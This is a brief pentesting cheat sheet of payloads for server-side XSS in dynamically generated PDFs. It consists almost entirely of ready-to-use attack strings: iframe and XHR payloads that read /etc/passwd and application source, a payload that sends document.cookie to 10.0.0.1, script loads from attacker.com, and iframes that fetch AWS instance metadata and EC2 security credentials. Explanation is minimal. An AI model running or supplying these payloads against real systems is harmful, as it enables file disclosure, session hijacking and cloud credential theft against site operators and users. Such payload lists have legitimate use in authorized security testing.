XSS with Dynamic PDF

If the PDF file, which is created somewhere in the website, that is reflected our payloads, we can insert malicious code.

- [server-side-xss-dynamic-pdf](https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf)

Basic

<img src='x' onerror="document.write('test')">
<script>document.write('test')</script>

"><h1>XSS</h1>


Path Disclosure

<img src='x' onerror="document.write(JSON.stringify(window.location))">
<script>document.write('<iframe src=\"' + window.location.href + '\"></iframe>')</script>


LFI/RFI

<iframe src="file:///etc/passwd"></iframe>
<iframe src=file:///etc/passwd width=1000px height=1000px></iframe>
<iframe src=file:///var/www/html/index.php width=1000px height=1000px></iframe>
<iframe src="http://localhost:3000/index.html"></iframe>
<iframe src="http://localhost/server-status" height="1000" width="1000"></iframe>

<img src='x' onerror="document.write('<iframe src=file:///etc/passwd></iframe>')">


LFI/RFI (XHR request)

<script>
    x = new XMLHttpRequest();
    x.onload = function() {
        document.write(this.responseText)
    };
    x.open("GET", "file:///etc/passwd");
    x.send();
</script>


<img src=x onerror="location.href='http://10.0.0.1/?cookie='+ document.cookie">


External Scripts

<script src="http://attacker.com/test.js"></script>

<img src='x' onerror="document.write('<script src=\"http://10.0.0.1/test.js\"></script>')" />


AWS Instances

<iframe src="http://169.254.169.254/latest/dynamic/instance-identity/" height=1000px width=1000px></iframe>
<iframe src="http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance" height=1000px width=1000px></iframe>

wkhtmltopdf

If the website uses “wkhtmltopdf”, please also refer to this page.